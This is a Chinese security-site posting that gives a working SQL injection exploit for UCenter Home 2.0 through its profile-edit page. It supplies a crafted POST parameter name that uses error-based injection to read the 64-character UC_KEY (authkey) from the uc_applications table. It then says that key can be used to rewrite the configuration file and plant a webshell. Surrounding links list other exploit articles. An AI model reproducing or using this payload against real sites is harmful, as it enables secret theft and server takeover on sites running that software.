首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
UCenter Home 2.0 鸡叻 SQL 注入
来源:vfocus.net 作者:alibaba 发布时间:2011-01-25  

作者:

alibaba

Exploit:
要求: magic_quote_gpc off
URL: cp.php?ac=profile&op=base

保存时创建一个POST,参数名为:
friend[a',(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]
参数值: 随意

这里我使用火狐的tamper实时添加POST

 

得到 uchome的 authkey



 

说明:由于dz加密方式太变态,不好破解,所以直接读取UC_KEY,uc_applications下的authkey即为UC_KEY。长度为64位

只要得到UC_KEY,提交数据就可以修改配置文件来得到Webshell

 

oldjun的博客有这个详细介绍,还有一篇大神的文章《火枪手 VS UCHOME》也有介绍,自己去看



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·HDWiKi V 5.0 本地包含0Day
·Exploit Linux Kernel Slub Over
·DEDECMS 0DAY
·DEDECMS恶作剧漏洞&任意修改文章
·风神新闻管理静态版1.7漏洞
·深圳迪蒙网络科技企业网站管理系
·华夏外挂下载系统2.0漏洞利用
·EimsCms v5.0 XSS+CSRF=GetShell
·ecshop最新版(v2.72) 本地包含漏
·ecshop支付漏洞最新可用EXP利用
·Diy-Page v8.2 两个注入漏洞分析
·动网(DVBBS)Version 8.2.0 后
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved